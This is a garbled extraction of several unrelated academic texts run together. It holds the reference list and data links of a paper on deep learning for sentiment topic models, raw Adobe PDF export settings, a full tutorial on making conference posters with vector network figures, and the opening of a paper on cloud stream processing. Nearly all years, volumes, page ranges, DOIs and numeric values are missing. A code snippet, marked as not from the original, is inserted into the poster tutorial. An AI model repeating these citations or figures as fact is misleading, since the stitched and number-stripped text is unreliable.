- bashar awwad shiekh hasan conceived and designed the experiments, analysed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability:
the code used to generate the topic modelling data is available in the supplemental file. the data is publicly available at the following locations:
imdb movie review dataset (imdb): http://ai.stanford.edu/~amaas/data/sentiment/.
movie reviews: sentiment polarity datasets (movie-rev ): https://www.kaggle.com/nltkdata/sentence-polarity.
movie reviews: sentiment scale datasets (movie-rev ): https://www.kaggle.com/nltkdata/movie-review.
subjectivity datasets (movie-sub): https://www.kaggle.com/nltkdata/subjectivity.
umich si —sentiment classification (umich): https://www.kaggle.com/seesea /umich-si -nlp.
sms spam collection data set (sms-spam): https://www.kaggle.com/uciml/sms-spam-collection-dataset/discussion/ .
multi-domain sentiment dataset (mdsd): https://www.cs.jhu.edu/~mdredze/datasets/sentiment/index .html.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
agarwal a, xie b, vovsha i, rambow o, passonneau r. . sentiment analysis of twitter data. in: proceedings of the workshop on languages in social media, lsm ' . stroudsburg: association for computational linguistics, – .
al moubayed n, wall d, mcgough as. . identifying changes in the cybersecurity threat landscape using the lda-web topic modelling data search engine. in: international conference on human aspects of information security, privacy, and trust. cham: springer, – .
alain g, bengio y. . what regularized auto-encoders learn from the data-generating distribution. journal of machine learning research ( ): – .
almeida ta, hidalgo jmg, yamakami a. . contributions to the study of sms spam filtering: new collection and results. in: proceedings of the th acm symposium on document engineering. new york: acm, – .
almoubayed n, breckon t, matthews p, mcgough s. . sms spam filtering using probabilistic topic modelling and stacked denoising autoencoder. in: th international conference on artificial neural networks. cham: springer, – .
baccianella s, esuli a, sebastiani f. . sentiwordnet . : an enhanced lexical resource for sentiment analysis and opinion mining. in: proceedings of the seventh international conference on language resources and evaluation (lrec' ). vol. , – .
bengio y. . learning deep architectures for ai. foundations and trends® in machine learning ( ): – doi . / .
bengio y, courville a, vincent p. . representation learning: a review and new perspectives. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . .
bengio y, courville ac, vincent p. . unsupervised feature learning and deep learning: a review and new perspectives. available at http://arxiv.org/abs/ . .
blei d, carin l, dunson d. . probabilistic topic models. ieee signal processing magazine ( ): – doi . /msp. . .
blei dm. . probabilistic topic models. communications of the acm ( ): – doi . / . .
blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research ( – ): – .
blitzer j, dredze m, pereira f. . biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. in: proceedings of the th annual meeting of the association of computational linguistics. prague: association for computational linguistics, vol. , – .
bollegala d, weir d, carroll j. . cross-domain sentiment classification using a sentiment sensitive thesaurus. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . .
bourlard h, kamp y. . auto-association by multilayer perceptrons and singular value decomposition. biological cybernetics ( – ): – doi . /bf .
bradley mm, lang pj. . affective norms for english words (anew): instruction manual and affective ratings. technical report c- . the center for research in psychophysiology, university of florida.
bravo-marquez f, mendoza m, poblete b. . combining strengths, emotions and polarities for boosting twitter sentiment analysis. in: proceedings of the second international workshop on issues of sentiment discovery and opinion mining. new york: association for computing machinery, .
cambria e, havasi c, hussain a. . senticnet : a semantic and affective resource for opinion mining and sentiment analysis. in: proceedings of the th international florida artificial intelligence research society conference. – .
canini k, shi l, griffiths t. . online inference of topics with latent dirichlet allocation. in: proceedings of the twelfth international conference on artificial intelligence and statistics. – .
clement j. . number of monthly active twitter users worldwide from st quarter to st quarter . available at https://www.statista.com/statistics/ /number-of-monthly-active-twitter-users/.
collobert r, weston j, bottou l, karlen m, kavukcuoglu k, kuksa p. . natural language processing (almost) from scratch. journal of machine learning research (august): – .
dang y, zhang y, chen h. . a lexicon-enhanced method for sentiment classification: an experiment on online product reviews. ieee intelligent systems ( ): – doi . /mis. . .
eguchi k, lavrenko v. . sentiment retrieval using generative models. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – .
erhan d, bengio y, courville a, manzagol p-a, vincent p, bengio s. . why does unsupervised pre-training help deep learning? journal of machine learning research : – .
esuli a, sebastiani f. . sentiwordnet: a publicly available lexical resource for opinion mining. in: proceedings of the fifth international conference on language resources and evaluation (lrec' ). genoa: european language resources association (elra). vol. , – .
go a, bhayani r, huang l. . twitter sentiment classification using distant supervision. cs n project report. , stanford university, .
green d, swets j. . signal detection theory and psychophysics. society : .
hinton ge, osindero s, teh y-w. . a fast learning algorithm for deep belief nets. neural computation ( ): – doi . /neco. . . . .
hinton ge, salakhutdinov rr. . reducing the dimensionality of data with neural networks. science ( ): – doi . /science. .
hinton ge, zemel rs. . autoencoders, minimum description length, and helmholtz free energy. advances in neural information processing systems : .
hofmann t. . probabilistic latent semantic analysis. in: proceedings of the fifteenth conference on uncertainty in artificial intelligence. burlington: morgan kaufmann publishers, – .
hong j, fang m. . sentiment analysis with deeply learned distributed representations of variable length texts. stanford: stanford university.
huh s, fienberg se. . discriminative topic modeling based on manifold learning. acm transactions on knowledge discovery from data (tkdd) ( ): – doi . / . .
japkowicz n, hanson sj, gluck ma. . nonlinear autoassociation is not equivalent to pca. neural computation ( ): – doi . / .
jo y, oh ah. . aspect and sentiment unification model for online review analysis. in: proceedings of the fourth acm international conference on web search and data mining. new york: acm, – .
kalchbrenner n, grefenstette e, blunsom p. . a convolutional neural network for modelling sentences. available at http://arxiv.org/abs/ . .
kennedy a, inkpen d. . sentiment classification of movie reviews using contextual valence shifters. computational intelligence ( ): – doi . /j. - . . .x.
lakkaraju h, socher r, manning c. . aspect specific sentiment analysis using hierarchical deep learning. in: deep learning and representation learning workshop at nips, december , montreal.
li s, huang c-r, zhou g, lee sym. . employing personal/impersonal views in supervised and semi-supervised sentiment classification. in: proceedings of the th annual meeting of the association for computational linguistics. stroudsburg: association for computational linguistics, – .
lin c, he y. . joint sentiment/topic model for sentiment analysis. in: proceedings of the th acm conference on information and knowledge management. new york: acm, – .
liu b. . sentiment analysis and opinion mining. synthesis lectures on human language technologies ( ): – doi . /s ed v y hlt .
maas al, daly re, pham pt, huang d, ng ay, potts c. . learning word vectors for sentiment analysis. in: proceedings of the th annual meeting of the association for computational linguistics: human language technologies. stroudsburg: association for computational linguistics, vol. , – .
macmillan na, creelman cd. . detection theory: a user's guide. hove: psychology press.
mcauliffe jd, blei dm. . supervised topic models. in: advances in neural information processing systems. – .
mei q, ling x, wondra m, su h, zhai c. . topic sentiment mixture: modeling facets and opinions in weblogs. in: proceedings of the th international conference on world wide web. new york: acm, – .
mirowski p, ranzato m, lecun y. . dynamic auto-encoders for semantic indexing. in: proceedings of the nips workshop on deep learning, – .
mohammad sm, turney pd. . crowdsourcing a word-emotion association lexicon. computational intelligence ( ): – doi . /j. - . . .x.
neri p. . how inherently noisy is human sensory processing? psychonomic bulletin & review ( ): – doi . /pbr. . . .
ngiam j, chen z, koh pw, ng ay. . learning deep energy models. in: proceedings of the th international conference on machine learning (icml- ). madison: omnipress, – .
nguyen dq, nguyen dq, vu t, pham sb. . sentiment classification on polarity reviews: an empirical study using rating-based features. in: proceedings of the th workshop on computational approaches to subjectivity, sentiment and social media analysis. stroudsburg: association for computational linguistics, – .
nielsen fÅ. . a new anew: evaluation of a word list for sentiment analysis in microblogs. available at http://arxiv.org/abs/ . .
pang b, lee l. . a sentimental education: sentiment analysis using subjectivity summarization based on minimum cuts. in: proceedings of the nd annual meeting on association for computational linguistics. stroudsburg: association for computational linguistics.
pang b, lee l. . seeing stars: exploiting class relationships for sentiment categorization with respect to rating scales. in: proceedings of the rd annual meeting on association for computational linguistics. stroudsburg: association for computational linguistics, – .
pang b, lee l, vaithyanathan s. . thumbs up? sentiment classification using machine learning techniques. in: proceedings of the acl- conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, vol. , – .
perotte aj, wood f, elhadad n, bartlett n. . hierarchically supervised latent dirichlet allocation. in: proceedings of the th international conference on neural information processing systems, – .
pollack jb. . recursive distributed representations. artificial intelligence ( ): – doi . / - ( ) -k.
porteous i, newman d, ihler a, asuncion a, smyth p, welling m. . fast collapsed gibbs sampling for latent dirichlet allocation. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – .
pouransari h, ghili s. . deep learning for sentiment analysis of movie reviews. available at https://cs d.stanford.edu/reports/pouransarihadi.pdf.
riloff e, wiebe j, phillips w. . exploiting subjectivity classification to improve information extraction. in: proceedings of aaai- , the th national conference on artificial intelligence. menlo park: aaai press, vol. , .
saif h, fernandez m, he y, alani h. . evaluation datasets for twitter sentiment analysis: a survey and a new dataset, the sts-gold. in: st international workshop on emotion and sentiment in social and expressive media: approaches and perspectives from ai (essem ). turin, italy.
shirani-mehr h. . applications of deep learning to sentiment analysis of movie reviews. available at https://cs d.stanford.edu/reports/shirani-mehrh.pdf.
smith g. . amazing facebook statistics and facts for : by the numbers. available at http://expandedramblings.com/index.php/by-the-numbers- -amazing-facebook-stats.
socher r, pennington j, huang eh, ng ay, manning cd. . semi-supervised recursive autoencoders for predicting sentiment distributions. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – .
socher r, perelygin a, wu jy, chuang j, manning cd, ng ay, potts c. . recursive deep models for semantic compositionality over a sentiment treebank. in: proceedings of the conference on empirical methods in natural language processing (emnlp). seattle: association for computational linguistics, – .
spacy. . spacy large core english model. available at https://spacy.io/usage/models.
tang d, wei f, qin b, liu t, zhou m. a. coooolll: a deep learning system for twitter sentiment classification. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin: association for computational linguistics, – .
tang d, wei f, yang n, zhou m, liu t, qin b. b. learning sentiment-specific word embedding for twitter sentiment classification. in: proceedings of the nd annual meeting of the association for computational linguistics. baltimore: association for computational linguistics, – .
teh yw, jordan mi, beal mj, blei dm. . sharing clusters among related groups: hierarchical dirichlet processes. in: proceedings of the th international conference on neural information processing systems. – .
thelwall m, buckley k, paltoglou g. . sentiment strength detection for the social web. journal of the american society for information science and technology ( ): – doi . /asi. .
umich. . umich si —sentiment classification. available at https://www.kaggle.com/c/si winter .
vincent p, larochelle h, lajoie i, bengio y, manzagol p-a. . stacked denoising autoencoders: learning useful representations in a deep network with a local denoising criterion. journal of machine learning research : – .
voegtlin t, dominey pf. . linear recursive distributed representations. neural networks ( ): – doi . /j.neunet. . . .
whitelaw c, garg n, argamon s. . using appraisal groups for sentiment analysis. in: proceedings of the th acm international conference on information and knowledge management. new york: acm, – .
wilson t, wiebe j, hoffmann p. . recognizing contextual polarity in phrase-level sentiment analysis. in: proceedings of the conference on human language technology and empirical methods in natural language processing. stroudsburg: association for computational linguistics, – .
stroudsburg: association for computational linguistics, – . wu jy, pao y. . predicting sentiment from rotten tomatoes movie reviews. available at https://nlp.stanford.edu/courses/cs n/ /reports/wujean_paoyuanyuan_ nreport.pdf. zhu j, ahmed a, xing ep. . medlda: maximum margin supervised topic models for regression and classification. in: proceedings of the th annual international conference on machine learning. new york: acm, – . zirn c, niepert m, stuckenschmidt h, strube m. . fine-grained sentiment analysis with structural features. in: proceedings of th international joint conference on natural language processing. chiang mai: asian federation of natural language processing, – . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /asi. https://www.kaggle.com/c/si winter http://dx.doi.org/ . /j.neunet. . . https://nlp.stanford.edu/courses/cs n/ /reports/wujean_paoyuanyuan_ nreport.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling introduction related work methods data sets and experiments results discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . 
/hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . 
creating a conference poster with high-resolution network figures

jürgen pfeffer, technical university of munich, bavarian school of public policy

abstract
creating a poster with high-resolution network images can be a challenging task. in this article, the process of exporting a network figure from a network analysis tool, importing it in a vector graphics tool, and preparing the poster for print is discussed. the steps include critical strategies for producing print-quality figures that also apply to the preparation of network figures for journal publication. we discuss different file formats and argue that the favorite tool for creating conference posters – microsoft powerpoint – is not suitable for posters that include network figures. instead, we suggest the use of inkscape, a free and open-source tool, or a comparable vector graphics tool to prepare your posters. the goal of this article is to provide a tutorial-like description of the critical steps for creating a conference poster with high-resolution network figures.

author
jürgen pfeffer is professor of computational social science and big data at the bavarian school of public policy at technical university of munich. his research deals with the analysis of large and dynamic social, political and economic systems as well as with methodological, algorithmic and theoretical challenges arising from these analyses. pfeffer's work is at the interface between social sciences and computer sciences.

introduction
visualization is crucial for the development of a scientific field (crosby, ; freeman, ). network visualizations are great ways to present the results of scientific projects. much of the attention of research related to network visualization has focused on positioning the nodes in the figure, i.e. the layout of the network (brandes, freeman & wagner, ; eades, ). recently, the focus of interest in the context of network visualization has shifted to using visual elements for mapping multivariate information to network images (hennig, brandes, pfeffer & mergel, ; krempel, , ; pfeffer, ). however, when it comes to creating a poster with a network figure, these mapping strategies cover only some of the necessary steps. table shows the entire process of creating a network poster from pre-processing the network data to completion of the poster by the print shop.
in this article we discuss the technical details of the points "export figure," "import network figure" in a vector graphics tool, and also "save poster for printing." we also offer short comments on "transfer poster file to printer". these crucial steps for creating a poster with a high-resolution network figure are described below. it is important to notice that all of these steps are essential and not optional. we do not discuss general aspects of poster layout, e.g. arranging text and figures; the focus is on the quality of the network figures on the poster. most of the strategies discussed here also apply to preparing network figures for print publications. in poster creation, many roads can lead to success (or failure). in the following, several decisions have been made and, for the sake of simplicity, only a few of the possible alternatives are discussed. the goal here is to provide a tutorial text that will work for most scholars irrespective of their current knowledge or experience.

table: workflow of creating a poster with a network figure. steps in bold are discussed in this text.
pre-processing: prepare network data • prepare attributes • import data
sna tool: create layout • map information • export figure
vector graphics tool: import network figure • create poster • save poster for printing
poster printing: transfer poster file • print poster • get poster to conference

export network figure
the first challenge is to save your network figure in your favorite sna tool as a vector graphics file. in vector graphics, network drawings are stored as polygons. in other words, a circular node is stored with x/y coordinates, as well as with the radius and the color information for filling the circle. a link is stored with both pairs of x/y coordinates of the nodes that this link is connecting. when this file is read and the network is drawn, it literally gets drawn circle by circle and line by line. in contrast, raster format files were developed to store images created from photos. storing a photo can be imagined as putting a raster over the image and storing information for every cell (pixel) of this raster. while this is a fine approach for storing images from digital cameras, the right-hand images in figure show the problem that results when storing network figures. images that may look good on screen can have very poor resolution on a poster, which will be much larger than the screen. the reason for the pixelated effect is that zooming a raster image merely makes the raster larger. on the other hand, a circle from a vector graphics file gets drawn larger by, literally, drawing a circle with a larger radius and a line stays a line, just with different coordinates. consequently, you can endlessly zoom in at the vector graphics file without losing any resolution quality.

figure: a network node and a link stored in a vector graphics file (left) and in a raster file (right)

export as pdf/eps. there are two very popular file formats for vector graphics: adobe's pdf (portable document format), and eps (encapsulated postscript). although there are significant differences between these two file formats, they can be used interchangeably in current software programs. so, the first step in creating a poster with a decent network visualization is to export the network drawing as a pdf or eps. there are also other file formats that will do the job, e.g.
svg (scalable vector graphics) or even a format for three-dimensional graphics such as vrml (virtual reality modeling language). netdraw, the visualization tool of ucinet (borgatti, everett, & freeman, ), does not support pdf/eps. instead, with netdraw, it is possible to export a network drawing as a "metafile," e.g. emf (enhanced metafile) and (wmf) windows metafile. the logic of these file formats is similar to pdf/eps, and most vector graphics tools (see next section) can import them. the decision on which to choose for your preferred file format will depend on positive answers to these three questions: is the format made for vector graphics? can my sna tool export files with this format? can my graphics tools import files with this format? (to answer this question, google and wikipedia can help.) if none of the above-mentioned file formats is available in your favorite network tool, then there is one last option: you can use a pdf creator tool, e.g. adobe acrobat or primopdf, and print the network into a pdf. however, this approach is not always successful when it comes to the next step, described in the following section. independently from how you extract a vector graphics file from your favorite sna tool, this step is critical and cannot be bypassed. in other words, you should only use a tool that offers a vector graphics export option. if the tool you've selected does not offer that, you should not use it. or, you could call upon the authors of the tool to add this feature!

never use jpg. there is one file format that should never be used for exporting network figures: jpg or jpeg, an acronym for joint photographic experts group, a committee that created this standard. jpg files are often used for photos from cameras or phones because they compress the image data before storing it. the compression works well enough for photos because the human eye does not need to distinguish among a vast number of shades of blue to recognize the sky in a photo. but with network drawings, the jpg data compression has tremendous ill effects on the quality of the figure. the most obvious distortion is that blurry areas will be drawn around lines as the jpg compression algorithm tries to interpolate a gray area between the black line and the white background.

png can be not so bad. if you are stuck with a tool that has no vector-graphics export option, you should export your network figure as png (portable network graphics). don't be confused by the word network; png is a raster file format and therefore not preferable for network drawings. however, the png is a lossless compression format, so that the blurry areas of the jpg can be avoided. the pixel effect from zooming (see figure ) is still an issue for png. this can be (in part) overcome by creating the png with high resolution – if the sna tool offers this option. raster graphics resolution is described in dpi (dots per inch). the human eye needs about dpi in order not to see the actual pixels. this means that a x inch area on paper should have x = pixels. when you use an image with dpi for your poster and you re-size it to % to better fit your poster space, the area of pixels in the raster gets five times larger, resulting in an image with dpi. at this resolution humans can easily discern pixels, and this reduces the visual quality of the network drawing on a poster. consequently, or even , dpi should be used – but this will create huge files.
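to make the dpi arithmetic above concrete, here is a small sketch (not part of the original article) that computes the dpi an enlarged raster figure actually delivers on paper; the 300 dpi legibility threshold and the pixel and print sizes are assumed example values used only for illustration.

```python
def effective_dpi(pixel_width: int, printed_width_inches: float) -> float:
    """dots per inch actually delivered when a raster image of
    pixel_width pixels is printed at printed_width_inches wide."""
    return pixel_width / printed_width_inches

# assumed example: a figure exported 1500 px wide, intended for a
# 5-inch slot, but later enlarged to 25 inches on the poster.
export_px = 1500
print(effective_dpi(export_px, 5))    # 300.0 dpi -> pixels no longer visible
print(effective_dpi(export_px, 25))   # 60.0 dpi  -> visibly pixelated

# minimum pixel width needed to keep an assumed 300 dpi threshold:
target_dpi = 300
poster_width_inches = 25
print(target_dpi * poster_width_inches)  # 7500 px wide raster required
```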
in a nutshell, then, while png files can create decent network images, vector graphics files will always have better resolution and will look better on your poster.

graphics tools
here is the bad news. you cannot use powerpoint (or its freely available emulations) for creating your poster because these tools cannot handle vector graphics files. instead, we need to turn to tools that are optimized for vector graphics file formats. adobe illustrator is a widely used (but costly) tool for this purpose. however, there are freely available alternatives to illustrator. for the purposes of this article we use inkscape, as it is freely available for windows, mac, and linux (download and tutorial: https://www.inkscape.org/). an easy test for whether a tool qualifies for our purpose is to import the vector graphics file that you have extracted as described above, and zoom in as far as possible on a single node. if you can still see a nicely drawn circle, then this tool can handle vector graphic files. if you see pixels similar to the right-hand images of figure , then this tool does not qualify for the task of creating a poster with a high-resolution network image. to bring into inkscape a network drawing that is stored in a vector graphics file, select file/import and import the network to your open poster document. now, zoom in thousands of percentages to double-check the correct transfer of your vector graphics-based network image. when you zoom out again and click on the network, you will see that the imported network is an object that can be moved around and changed in size. if you change the size make sure to hold the ctrl key while doing that so as to preserve the height/width ratio of the image. inkscape is very intuitive and many tutorials can be found online that will help you to add the additional text, logo, and other visual elements needed for your poster.

handling accented characters. when you have finished your poster layout, make sure that you save it as a pdf as this is the preferred file format of poster print shops. there is one more trick that is especially important if your poster contains special fonts or non-english characters. if you select all objects of your poster (press ctrl-a) and then select path/object to path in the menu, then all text will also be transformed to paths, i.e. vector graphics objects. consequently, the poster printer can print your poster even if the language or font is not installed on the printer's computer. without this step, the print process could change your font and replace some characters with interesting-looking special characters. transforming fonts to paths should be the very last step before storing the poster as a pdf for the print shop. be aware that you cannot change any text after this transformation step.

poster printing
the process of actually printing the poster is straightforward if you have created a pdf in a similar way to the process described above. here are some additional comments that should make your life easier and your poster more attractive:
• before starting to work on your poster, go to the conference website and figure out the size of the poster boards as well as whether the posters should be in portrait or landscape orientation.
• spend the extra few bucks and go for the gloss paper – you will love it. in any case, try to avoid very thin (light) paper.
• if the poster session is not during the first evening of the conference, think about printing the poster close to the conference venue. for instance, in the united states most fedex shops print posters. call a week before the conference and double-check that a) the print shop actually exists, b) it is at the place that google tells you, and c) the person doing the prints will accept print orders via email or file download.
• good-quality posters can result in large pdf files. if your file is larger than mb, use a file transfer service, e.g. https://www.wetransfer.com/
• get a poster tube for transporting your poster – yes, these tubes can be part of your cabin luggage, no check-in necessary. but don't let the poster sit in that tube for two weeks or it will become hard to unroll.

an example
to illustrate the significant differences between a vector graphics file and a raster format file we use a partial reproduction of a very old network visualization. in an effort to create an encyclopedia of the natural sciences, georges-louis leclerc, comte de buffon, visualized dog breeds and their relationships (buffon, ; mayer, ). the left-hand image in figure was created along the lines of the process described above. the result is a clearly printed high-resolution image that could also be printed in any size on a poster. the right-hand side is a low-resolution jpg file that was enlarged for printing. one can easily see the effects described above: blurry lines and text as well as pixelation. this example also shows that the above-mentioned process is important for network figures in journal articles.

figure: partial reconstruction of buffon's dog breeds and their relationships; comparison of printing quality of vector graphics file (left) and raster file (right).

references
borgatti, s.p., everett, m.g. & freeman, l.c. ( ). ucinet for windows: software for social network analysis. harvard, ma: analytic technologies.
brandes, u., freeman, l.c. & wagner, d. ( ). social networks. in r. tamassia, handbook of graph drawing and visualization (pp. – ). boca raton, fl: crc press.
buffon, g.-l.l., comte de ( ). histoire naturelle, générale et particulière. vol. le chien avec ses variétés. paris: imprimerie royale.
crosby, a.w. ( ). the measure of reality: quantification in western europe, - . new york, ny: cambridge university press.
eades, p. ( ). a heuristic for graph drawing. congressus numerantium, ( ), pp. – .
freeman, l.c. ( ). visualizing social networks, journal of social structure, ( ).
hennig, m., brandes, u., pfeffer, j., & mergel, i. ( ). studying social networks. a guide to empirical research. frankfurt: campus verlag.
krempel, l. ( ). visualisierung komplexer strukturen: grundlagen der darstellung mehrdimensionaler netzwerke (auflage: . sonderband auflage). frankfurt am main: campus verlag.
krempel, l. ( ). network visualization. in j. scott & p.j. carrington (eds.), the sage handbook of social network analysis (pp. – ). thousand oaks, ca: sage publications.
mayer, k. ( ). network visualization. historical fragments of a visual culture. in m. füllsack (ed.), networking networks, origins, applications, experiments. university of graz, at: institute of systems sciences, innovation and sustainability research report # (pp. – ).
pfeffer, j. ( ). visualization of political networks. in: j.n. victor, a.h. montgomery, m. lubell (eds.), the oxford handbook of political networks.
oxford university press, pp. – .

cost-efficient enactment of stream processing topologies

christoph hochreiner, michael vögler, stefan schulte and schahram dustdar
distributed systems group, tu wien, vienna, austria; tu wien, vienna, austria

abstract
the continuous increase of unbound streaming data poses several challenges to established data stream processing engines. one of the most important challenges is the cost-efficient enactment of stream processing topologies under changing data volume. these data volumes pose different loads to stream processing systems, whose resource provisioning needs to be continuously updated at runtime. first approaches already allow for resource provisioning on the level of virtual machines (vms), but this only allows for coarse resource provisioning strategies. based on current advances and benefits for containerized software systems, we have designed a cost-efficient resource provisioning approach and integrated it into the runtime of the vienna ecosystem for elastic stream processing. our resource provisioning approach aims to maximize the resource usage for vms obtained from cloud providers. this strategy only releases processing capabilities at the end of the vms minimal leasing duration instead of releasing them eagerly as soon as possible, as is the case for threshold-based approaches. this strategy allows us to improve the service level agreement compliance by up to % and to reduce the operational cost by up to %.

subjects adaptive and self-organizing systems, distributed and parallel computing
keywords data stream processing, cloud computing, resource elasticity, resource optimization

introduction
due to the transition toward a data-centric society, today's stream processing engines (spes) need to deal with a continuous increase of unbound streaming data regarding volume, variety, and velocity (mcafee et al., ). currently, this growth in data is mainly driven by the rise of the internet of things (iot). sensors, which represent a vital part of the iot, emit a huge volume of streaming data that needs to be processed to provide additional value to users or to trigger actions for iot devices or other services, e.g., to handle user notifications. furthermore, many scenarios call for data processing in near real-time, which requires the application of spes like system s (gedik et al., ), apache storm (toshniwal et al., ), heron (kulkarni et al., ), or apache spark (zaharia et al., ). state-of-the-art spes provide the user with an extensive set of apis to design and enact stream processing topologies. these topologies represent a composition of different stream processing operators, like filters, transformations, or other operations, which are required to process data (gedik et al., ). although spes are highly efficient regarding data processing, they struggle with varying volumes of data over time (hochreiner et al., ). because most spes operate on a fixed
amount of computational resources, e.g., on clusters, they cannot adapt to changes of the data volume at runtime (hochreiner et al., a). one solution for this issue is the over-provisioning of computational resources so that the spe can process any amount of incoming data while complying with given service level agreements (slas). while this approach ensures a high level of sla compliance, it is not cost-efficient because the provisioned computational resources are not used most of the time. the more economically feasible approach to this challenge is under-provisioning, where an spe is equipped with computational resources to cover most of the incoming data scenarios. however, in the case of under-provisioning, the spe may cover most scenarios, but it may also violate slas in some high load scenarios, due to a delay in the data processing. based on the cloud computing paradigm (armbrust et al., ), a more promising provisioning approach, namely elastic provisioning for stream processing systems, emerged in recent years (satzger et al., ; gedik et al., ; heinze et al., ; lohrmann, janacik & kao, ; xu, peng & gupta, ). this approach allows the spe to lease computational resources on-demand whenever they are required. resources can be released again as soon as they are not needed anymore. this approach allows for the cost-efficient enactment of stream processing topologies while maintaining high sla compliance (hochreiner et al., a). up to now, most elastic provisioning approaches only consider virtual machines (vms) as the smallest entity for leasing and releasing of computational resources. this approach is perfectly applicable for private clouds, where the only objective of resource provisioning algorithms is resource-efficiency, and there is no need to consider any billing aspects or billing time units 